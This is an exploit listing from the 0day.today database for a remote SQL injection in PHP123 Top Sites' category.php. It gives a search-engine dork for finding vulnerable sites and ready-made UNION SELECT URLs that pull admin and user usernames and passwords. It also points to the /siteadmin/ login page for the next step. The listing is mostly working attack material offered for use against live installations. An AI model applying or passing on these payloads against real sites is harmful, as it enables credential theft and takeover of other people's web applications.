[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2053
Category
web applications
Date add
27-07-2007
Platform
unsorted
=============================================================
PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln
=============================================================



--==+================================================================================+==--
--==+		    PHP123 Top Sites SQL Injection Vulnerbility 	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Browse our directory of our members top sites or create your own for free!"


DESCRIPTION: 
pull out admin/users login credentials


EXPLOITS:
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/admin/*
http://server.com/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/users/*


NOTE/TIP: 
admin login is at /siteadmin/
altavista also returns a few diffrent results, dnt use the allintext: thou.



#  0day.today [2024-11-16]  #